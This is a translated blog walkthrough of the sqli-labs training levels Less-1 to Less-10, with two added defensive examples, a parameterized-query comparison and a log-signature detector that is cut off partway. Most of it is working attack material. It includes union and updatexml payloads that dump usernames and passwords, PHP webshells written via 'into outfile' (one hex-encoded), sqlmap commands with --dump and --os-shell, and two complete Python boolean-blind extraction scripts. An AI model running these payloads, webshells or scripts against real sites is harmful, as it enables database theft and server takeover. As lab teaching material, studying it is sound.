References:
Detailed sqli-labs (1-65) walkthrough (糊涂是福yyyy's blog, CSDN)
MySQL group_concat() function (MySQL tutorial, yiibai.com)
SQLMAP database dumping procedure (POST request, three methods) (doubboCode's blog, CSDN)
How is your personal information stolen? MySQL database dumping: what it is, how it works, the steps, one database / three tables / six fields (士别三日wyx's blog, CSDN)
MySQL database backup ("dumping") (简书, jianshu.com)
Blind injection: understanding the updatexml() function
MySQL UPDATEXML() in detail: updating a node value in an XML document (pythonjishu.com)
Error-based SQL injection, updatexml(1,concat(0x7e,database(),0x7e),1) (头顶蜘蛛网,脚踩大水缸's blog, CSDN)
Markdown + Typora tutorial (NikkoLKR's blog, CSDN) (image-hosting setup)
MySQL statements used throughout:

```mysql
show databases;
show tables;
use information_schema; -- select the information_schema database
show columns from table_1; -- show the columns of table_1 and their attributes
select * from tables limit 0,1; -- show the contents of the tables table in information_schema
select group_concat(table_name) from information_schema.tables where table_schema='security';
select group_concat(column_name) from information_schema.columns where table_name='users';
select group_concat(username,id,password) from security.users;
```
# Less-1: single-quote closure, error-based injection

1. Request http://192.168.199.129/Less-1/?id=1' -> error
2. Request http://192.168.199.129/Less-1/?id=1' and 1=1 --+ -> succeeds
So the injection point is string-typed.
3. Check the source code.
# Less-2: integer type, error-based injection

1. Request http://192.168.199.129/Less-2/?id=2 -> succeeds
2. Request http://192.168.199.129/Less-2/?id=2%27%20and%201=1--+ (id=2' and 1=1--+) -> fails
3. Request http://192.168.199.129/Less-2/?id=2%20and%201=1%20--+ (id=2 and 1=1 --+) -> succeeds
4. Check the source code.
5. Print the SQL statement after the injected input.
So the injection point is integer-typed.

1. Union injection: use order by 1,2,3 to find out how many columns are returned:
http://192.168.199.129/Less-2/?id=2%20order%20by%201%20--+ (id=2 order by 1 --+)
The fourth column does not exist at all, so there are three columns in total.

The query is "SELECT * FROM users WHERE id=$id LIMIT 0,1"; the error message shows "SELECT * FROM users WHERE id=1 ' LIMIT 0,1".
```mysql
?id=1 order by 3
?id=-1 union select 1,2,3
?id=-1 union select 1,database(),version()
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
?id=-1 union select 1,2,group_concat(username ,id , password) from users
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile '/var/www/html/Less-2/less2.php' --+
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile 'less2.php' --+
?id=-1%20union%20select%201,2,%27%3C?php%20assert($_POST[less2]);?%3E%27%20into%20outfile%20%27C:/less2.php%27--%20s
```

```mysql
union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
```

Write less2.php to the host at the default path, then run find / -name 'less2.php' to locate the file.

```mysql
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile 'less2.php' --+
# this statement fails
?id=-1 union select 1,2,'<?php assert($_POST[less2]);?>' into outfile '/var/www/html/Less-2/less2.php' --+
```
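The query behind this level, `SELECT * FROM users WHERE id=$id LIMIT 0,1`, next to its hardened form, as an added example that is not part of the original post or sqli-labs: it replays the union payload from this section (and the quoted Less-1 variant) against string concatenation, a bound parameter, and an integer-typed parameter. An in-memory SQLite table with constructed rows stands in for the MySQL users table; the three lookup functions are this example's own names.

```python
import sqlite3

# Constructed rows standing in for sqli-labs' security.users table (id, username, password).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

# The union payloads from the Less-1/Less-2 sections, with the selected columns reduced to literals.
UNION_INT = "-1 union select 1,2,3"        # integer context (Less-2)
UNION_STR = "-1' union select 1,2,3 --+"   # single-quote context (Less-1)


def open_db():
    """In-memory stand-in for the security database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id, quoted=False):
    """The pattern behind Less-1/Less-2: the request value is pasted into the SQL text.
    quoted=False mirrors  SELECT * FROM users WHERE id=$id LIMIT 0,1   (Less-2)
    quoted=True  mirrors  SELECT * FROM users WHERE id='$id' LIMIT 0,1 (Less-1)"""
    value = "'" + user_id + "'" if quoted else user_id
    sql = "SELECT * FROM users WHERE id=" + value + " LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value is bound as a parameter, so it is only ever compared, never parsed."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_typed(conn, user_id):
    """Defence in depth for an integer id: reject anything that is not an integer before querying."""
    return lookup_parameterized(conn, int(user_id))  # raises ValueError on injected text


def compare():
    """Run a benign id and both page payloads through the vulnerable and hardened lookups."""
    conn = open_db()
    out = {
        "benign": lookup_vulnerable(conn, "1"),
        "vuln_int": lookup_vulnerable(conn, UNION_INT),             # union row comes back
        "vuln_str": lookup_vulnerable(conn, UNION_STR, quoted=True),  # comment eats the closing quote
        "param_int": lookup_parameterized(conn, UNION_INT),          # compared as text: no row
        "param_str": lookup_parameterized(conn, UNION_STR),
        "param_benign": lookup_parameterized(conn, 1),
    }
    try:
        lookup_typed(conn, UNION_INT)
        out["typed"] = "accepted"
    except ValueError:
        out["typed"] = "rejected"
    return out


if __name__ == "__main__":
    for name, result in compare().items():
        print(name, result)
```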
# Less-3: echo present, ') closure, union injection
```mysql
?id=1
?id=1' and 1=1 --+
?id=1 and 1=1 --+
?id=1' and 1=1 --+ # succeeds
?id=1' order by 1 --+ , ?id=1' order by 2 --+ , ?id=1' order by 8 --+
?id=1') order by 3 --+ # succeeds
?id=1') order by 4 --+ # error
?id=-1') union select 1,2,3 --+
?id=-1') union select 1,2,user() --+
?id=-1') union select 1,2,database() --+ # security
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ # table names in the database: emails,referers,uagents,users
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ # id,username,password
?id=-1') union select 1,2,group_concat(username,id,password) from security.users --+
```

After adding an echo of the query to the PHP code, the injection point for id can be seen as follows:
# Less-4: echo present, double-quote plus parenthesis closure, union injection

```mysql
/Less-4/?id=1 # SELECT * FROM users WHERE id=("1") LIMIT 0,1
/Less-4/?id=1") and 1=1 --+
/Less-4/?id=1") order by 3 --+
/Less-4/?id=1") order by 4 --+
/Less-4/?id=-1") union select 1,2,3 --+
/Less-4/?id=-1") union select 1,2,database() --+
/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
/Less-4/?id=-1") union select 1,2,group_concat(username,id,password) from security.users -- +
```
# Less-5: no echo, single-quote closure, error-based injection

Copied from 仙女象 and 头顶蜘蛛网,脚踩大水缸:

> First an easy example:
> select updatexml("abc","//div/p/text()","abcd") means: replace "abc" with "abcd", where the server locates "abc" through the XPath expression "//div/p/text()".
> If the XPath expression is malformed, the result of checking the XPath expression is shown in the error message, so if we replace the XPath expression with the information we want to know, that result is displayed through the error message.
> For example, select updatexml("abc",concat("~",database()),"abcd") returns the name of the database the server is currently using through the error message (as shown in the figure below).
```mysql
# get the current database name
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
# get all table names in the current database
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)-- s
# get all column names of the users table in the current database
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
# get the username and password values of the users table, 31 characters at a time
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),32,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),63,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),94,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),125,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),156,31),0x7e),1)-- s
http://192.168.101.16/sqli-labs-master/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),187,31),0x7e),1)-- s
# the step below writes a webshell
http://192.168.101.16/sqli-labs-master/Less-5/?id=1' into outfile 'C:/less5.php' lines terminated by 0x3c3f7068702061737365727428245f504f53545b6c657373355d293b3f3e-- s
```
SUBSTR(str, pos)
Returns the part of str from position pos to the end.
SUBSTR(str, pos, len)
Parameters:
str is the column name or string;
pos is the start position; in MySQL positions start at 1. A positive pos counts from the start of the string (the first character is position 1); a negative pos counts back from the end of the string;
len is the number of characters to take.
```mysql
/Less-5/?id=1 # runs correctly
/Less-5/?id=1' # syntax error
/Less-5/?id=1" # runs correctly
/Less-5/?id=1' and 1=1 --+ # runs correctly: single-quote closure, no echo
# use error-based injection:
/Less-5/?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
# 0x7e is simply the character '~'
/Less-5/?id=1'and updatexml(1,concat('~',(select database()),0x7e),1)-- s # current database
/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) -- s # all tables in the database
# all columns of the users table
/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
# contents of the users table
/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
```

Add an echo of the executed statement in the code to see the query that actually runs.
# Less-6: double-quote closure, no echo, error-based injection

```mysql
/Less-6/?id=1
/Less-6/?id=1'
/Less-6/?id=abc # no "You are in" here
/Less-6/?id=1" # error
/Less-6/?id=1' and 1=1 --s+ # runs normally but with no echo, so ' closure and no echo
/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) -- s
/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
```

substr('aaaaabbb...',1,62) seems to display at most 32 characters of the string.
Checking the source output shows the closure is ".
# Less-7: ')) closure, boolean-based blind injection (still to be run through once more by hand)

```mysql
/Less-7/?id=1
```

For manual injection the closure can be brute-forced with Burp Suite, which is not written up here. Once the closure is found, dumping the database and writing a webshell can begin.

```mysql
/Less-7/?id=1' # error
/Less-7/?id=1" # normal
```
Guess: it should be " closure, no echo, with error messages.
```mysql
/Less-7/?id=1 and 1=1
/Less-7/?id=1 and 1=1 --s # normal
####
/Less-7/?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) -- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),1,31),0x7e),1)-- s
/Less-7/?id=1')) and updatexml(1,concat(0x7e,substr((select group_concat(concat(username,'^',password)) from users),1,31),0x7e),1)-- s
```
The logic of the Python script below (which recovers the database name) is:
1. Use bisection to find the length of the database name:
assume the name is at most n characters long, split that range in two with each query, and narrow down to the real length.
2. Brute-force the characters of the name:
build a character list k, then query once per candidate character until each position is confirmed, which takes k * n queries in total (n being the length of the name).
```python
#!/usr/bin/python3
# coding=utf-8
"""
Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
import requests

url = "http://192.168.101.16/sqli-labs-master/Less-7/"  # URL with the exploitable parameter, fill in as appropriate
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
}  # HTTP request headers, fill in as appropriate
keylist = [chr(i) for i in range(33, 127)]  # digits, upper- and lower-case letters, printable special characters
flag = 'You are in'  # text that marks the appended SQL condition as true, taken from the page's echo


def CurrentDatabase7():
    n = 10  # guessed maximum length of the current database name, adjust as needed
    k = 0
    j = n // 2
    length = 0
    db = str()
    while True:
        if k < j < n and j - k > 3:
            payload1 = "1')) and length(database())>" + str(j) + "-- ss"  # adjust all payloads to the target
            print(payload1)
            param = {
                "id": payload1,
            }
            response = requests.get(url, params=param, headers=headers)  # send the payload in a GET request
            # print(response.request.headers)
            # print(response.text)
            if response.text.find(flag) != -1:
                k = j  # length > j: raise the lower bound
            else:
                n = j  # length <= j: lower the upper bound
            j = (n + k) // 2  # midpoint of the remaining interval [k, n]
        elif j - k <= 3:
            for i in range(k - 1, n + 2):  # interval is small enough: test each length directly
                payload2 = "1')) and length(database())=" + str(i) + "-- ss"
                param = {
                    "id": payload2,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of current database contains " + str(length) + " characters")
    for i in range(1, length + 1):  # one position at a time, one query per candidate character
        for c in keylist:
            payload3 = "1')) and substring(database()," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload3,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                db = db + c
                break
    print("the name of current database is " + str(db))


def Tables7():
    n = 100  # guessed maximum total length of all table names in the current database, adjust as needed
    k = 0
    j = n // 2
    length = 0
    tname = str()
    while True:
        if k < j < n and j - k > 3:
            payload4 = "1')) and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>" + str(j) + "-- ss"
            param = {
                "id": payload4,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = (n + k) // 2
        elif j - k <= 3:
            for i in range(k - 1, n + 2):
                payload5 = "1')) and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))=" + str(i) + "-- ss"
                param = {
                    "id": payload5,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all tables in current database contains " + str(length) + " characters")
    for i in range(1, length + 1):
        for c in keylist:
            payload6 = "1')) and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload6,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                tname = tname + c
                break
    print("the name of all tables in current database is " + str(tname))


def Columns7(table):  # table is the name of the table whose columns are wanted; pass it without quotes, the payload adds them
    n = 200  # guessed maximum total length of all column names of the table, adjust as needed
    k = 0
    j = n // 2
    length = 0
    cname = str()
    while True:
        if k < j < n and j - k > 3:
            payload7 = "1')) and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())))>" + str(j) + "-- ss"
            param = {
                "id": payload7,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = (n + k) // 2
        elif j - k <= 3:
            for i in range(k - 1, n + 2):
                payload8 = "1')) and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())))=" + str(i) + "-- ss"
                param = {
                    "id": payload8,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all columns in current table contains " + str(length) + " characters")
    for i in range(1, length + 1):
        for c in keylist:
            payload9 = "1')) and substr((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload9,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                cname = cname + c
                break
    print("the name of all columns in current table is " + str(cname))


def Content7(table, col1, col2):  # table is the table to read, col1 and col2 the two columns wanted; all passed without quotes
    n = 200  # guessed maximum length of the data expected, adjust as needed
    k = 0
    j = n // 2
    length = 0
    content = str()
    while True:
        if k < j < n and j - k > 3:
            payload10 = "1')) and (length((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")))>" + str(j) + "-- ss"
            param = {
                "id": payload10,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = (n + k) // 2
        elif j - k <= 3:
            for i in range(k - 1, n + 2):
                payload11 = "1')) and (length((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")))=" + str(i) + "-- ss"
                param = {
                    "id": payload11,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the content contains " + str(length) + " characters")
    for i in range(1, length + 1):
        for c in keylist:
            payload12 = "1')) and substr((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload12,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                content = content + c
                break
    print("the content is " + str(content))
```
Checking the source code: the closure is '))
Running the script dumps the database.
# Less-8: ' closure, boolean-based blind injection

```mysql
/Less-8/?id=1
/Less-8/?id=1' # error
/Less-8/?id=1' and 1=1 --s # no correct echo
```

Why can blind levels like 7 and 8 apparently not use an updatexml() statement to get output???
```mysql
/Less-8/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- s
```
Because print(mysql_error()); in the else branch is commented out, so updatexml cannot be used.

Brute-force with the script:
```python
#!/usr/bin/python3
# coding=utf-8
"""
functions for boolean-based sql injection(GET)
:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""
import requests

url = "http://192.168.199.129/Less-8/"  # URL with the exploitable parameter, fill in as appropriate
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
}  # HTTP request headers, fill in as appropriate
keylist = [chr(i) for i in range(33, 127)]  # digits, upper- and lower-case letters, printable special characters
flag = 'You are in'  # text that marks the appended SQL condition as true, taken from the page's echo


def CurrentDatabaseGET():
    n = 10  # guessed maximum length of the current database name, adjust as needed
    k = 0
    j = n // 2
    length = 0
    db = str()
    while True:
        if k < j < n and j - k > 3:
            payload1 = "1' and length(database())>" + str(j) + "-- ss"  # adjust all payloads to the target
            param = {
                "id": payload1,
            }
            response = requests.get(url, params=param, headers=headers)  # send the payload in a GET request
            # print(response.request.headers)
            # print(response.text)
            if response.text.find(flag) != -1:
                k = j  # length > j: raise the lower bound
            else:
                n = j  # length <= j: lower the upper bound
            j = (n + k) // 2  # midpoint of the remaining interval [k, n]
        elif j - k <= 3:
            for i in range(k - 1, n + 2):  # interval is small enough: test each length directly
                payload2 = "1' and length(database())=" + str(i) + "-- ss"
                param = {
                    "id": payload2,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of current database contains " + str(length) + " characters")
    for i in range(1, length + 1):  # one position at a time, one query per candidate character
        for c in keylist:
            payload3 = "1' and substring(database()," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload3,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                db = db + c
                break
    print("the name of current database is " + str(db))


def TablesGET():
    n = 100  # guessed maximum total length of all table names in the current database, adjust as needed
    k = 0
    j = n // 2
    length = 0
    tname = str()
    while True:
        if k < j < n and j - k > 3:
            payload4 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>" + str(j) + "-- ss"
            param = {
                "id": payload4,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = (n + k) // 2
        elif j - k <= 3:
            for i in range(k - 1, n + 2):
                payload5 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))=" + str(i) + "-- ss"
                param = {
                    "id": payload5,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all tables in current database contains " + str(length) + " characters")
    for i in range(1, length + 1):
        for c in keylist:
            payload6 = "1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload6,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                tname = tname + c
                break
    print("the name of all tables in current database is " + str(tname))


def ColumnsGET(table):  # table is the name of the table whose columns are wanted; pass it without quotes, the payload adds them
    n = 200  # guessed maximum total length of all column names of the table, adjust as needed
    k = 0
    j = n // 2
    length = 0
    cname = str()
    while True:
        if k < j < n and j - k > 3:
            payload7 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())))>" + str(j) + "-- ss"
            param = {
                "id": payload7,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = (n + k) // 2
        elif j - k <= 3:
            for i in range(k - 1, n + 2):
                payload8 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())))=" + str(i) + "-- ss"
                param = {
                    "id": payload8,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all columns in current table contains " + str(length) + " characters")
    for i in range(1, length + 1):
        for c in keylist:
            payload9 = "1' and substr((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema = database())," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload9,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                cname = cname + c
                break
    print("the name of all columns in current table is " + str(cname))


def ContentGET(table, col1, col2):  # table is the table to read, col1 and col2 the two columns wanted; all passed without quotes
    n = 200  # guessed maximum length of the data expected, adjust as needed
    k = 0
    j = n // 2
    length = 0
    content = str()
    while True:
        if k < j < n and j - k > 3:
            payload10 = "1' and (length((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")))>" + str(j) + "-- ss"
            param = {
                "id": payload10,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                k = j
            else:
                n = j
            j = (n + k) // 2
        elif j - k <= 3:
            for i in range(k - 1, n + 2):
                payload11 = "1' and (length((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")))=" + str(i) + "-- ss"
                param = {
                    "id": payload11,
                }
                response = requests.get(url, params=param, headers=headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the content contains " + str(length) + " characters")
    for i in range(1, length + 1):
        for c in keylist:
            payload12 = "1' and substr((select group_concat(concat(" + col1 + ",'^'," + col2 + ")) from " + table + ")," + str(i) + ",1)='" + c + "'-- ss"
            param = {
                "id": payload12,
            }
            response = requests.get(url, params=param, headers=headers)
            if response.text.find(flag) != -1:
                content = content + c
                break
    print("the content is " + str(content))


CurrentDatabaseGET()
```
# Less-9: time-based injection, ' closure

```mysql
/Less-9/?id=1
/Less-9/?id=1'
/Less-9/?id=1"
/Less-9/?id=1 and 1=1 # all identical
```

Reading the source code shows a ' closure, so construct a time-based blind payload:
```mysql
/Less-9/?id=1' and if(1=1,sleep(10),0)-- s
```

Copied from 仙女象 (replace the URL):
```shell
# get all database names
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dbs
# get the current database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --current-db
# get all table names of the security database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --tables -D security
# get all column names of the users table in the security database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --columns -D security -T users
# get the username and password column values of the users table in the security database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --dump -D security -T users -C username,password
# write a webshell
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-9/?id=1" --os-shell
```

The code shows that for this SQL statement the output is the same whether the statement is correct or not.
With the sleep statement, the page only refreshes after a delay.
# Less-10: time-based blind injection, " closure

```mysql
/Less-10/?id=1
/Less-10/?id=1'
/Less-10/?id=1"
```

The echo is identical in every case, so presumably the page shows the same content whether the SQL statement is correct or not.
sqlmap can be used for time-based blind brute-forcing:
```shell
# get the current database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --current-db --technique T --level 3
# get all table names of the security database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --tables -D security --technique T --level 3
# get all column names of the users table in the security database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --columns -D security -T users --technique T --level 3
# get the username and password column values of the users table in the security database
python sqlmap.py -u "http://192.168.101.16/sqli-labs-master/Less-10/?id=1" --dump -D security -T users -C username,password --technique T --level 3
```

For manual injection on this level, try adapting sqli_tb.py from JacquelinXiang/sqli_blind: A simple tool/framework for boolean-based or time-based sql injection(blind) (github.com).
Compared with level 9, only the closure differs.
The echo looks the same, but there are still subtle differences in the details, so boolean-based injection could in fact be used as well.
Basic approach to SQL injection:
Determine the closure:
' " ') ") or no closure
Then determine whether there is an echo:
If there is an echo and there are error messages, use error-based injection or union injection.
If there is no echo:
use time-based blind injection;
if a correct SQL statement and an incorrect one return different content and there are no error messages, use boolean-based blind injection.
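Seen from the defender's side, the same payload families that the approach above enumerates can be spotted in web-server access logs. This is an added example, not from the original post or sqli-labs: it runs regex signatures for the union, error-based (updatexml), boolean-blind (length/substr comparisons), time-based (sleep), information_schema and into outfile shapes used in Less-1 to Less-10 over constructed combined-format log lines, and also flags sqlmap's default User-Agent; the family names and the sample lines are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Payload families used across Less-1 to Less-10, as case-insensitive regexes applied to the
# URL-decoded request target. The family names are this example's own labels.
SIGNATURES = {
    "union-select": r"\bunion\s+(all\s+)?select\b",
    "error-based": r"\b(updatexml|extractvalue)\s*\(",
    "time-based": r"\b(sleep|benchmark)\s*\(",
    "boolean-blind": r"\b(length|substr|substring|ascii)\s*\(.*?\)\s*[=<>]",
    "schema-enum": r"\binformation_schema\.",
    "fingerprint": r"\b(database|version|user)\s*\(\s*\)",
    "file-write": r"\binto\s+(out|dump)file\b",
    "column-count": r"\border\s+by\s+\d+",
    "comment-terminator": r"(--[\s+]|#|/\*)",
}
COMPILED = {name: re.compile(pat, re.I | re.S) for name, pat in SIGNATURES.items()}

# Combined log format: request line, status, size, referer, user-agent.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
                    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')


def fully_decode(target, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (like the encoded Less-2 URL) are caught."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line):
    """Sorted list of payload families found in one access-log line; [] for a clean line."""
    m = LOG_RE.search(line)
    if not m:
        return ["unparsed"]
    target = fully_decode(m.group("target"))
    hits = [name for name, rx in COMPILED.items() if rx.search(target)]
    if "sqlmap" in m.group("ua").lower():  # sqlmap's default User-Agent names the tool
        hits.append("scanner-ua")
    return sorted(hits)


def scan_log(text):
    """Map 1-based line numbers to the families found; clean lines are left out."""
    report = {}
    for n, line in enumerate(text.strip().splitlines(), start=1):
        families = classify(line)
        if families:
            report[n] = families
    return report


# Constructed sample log (not real traffic); the targets mirror payload shapes from the sections above.
UA = "Mozilla/5.0"
TS = "[21/Sep/2023:10:00:00 +0800]"
SAMPLE_LOG = "\n".join([
    f'10.0.0.5 - - {TS} "GET /Less-2/?id=2 HTTP/1.1" 200 801 "-" "{UA}"',
    f'10.0.0.5 - - {TS} "GET /Less-5/?id=1%27and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--%20s HTTP/1.1" 200 912 "-" "{UA}"',
    f'10.0.0.5 - - {TS} "GET /Less-2/?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27 HTTP/1.1" 200 850 "-" "{UA}"',
    f'10.0.0.5 - - {TS} "GET /Less-7/?id=1%27))%20and%20substring(database(),1,1)=%27s%27--%20ss HTTP/1.1" 200 790 "-" "{UA}"',
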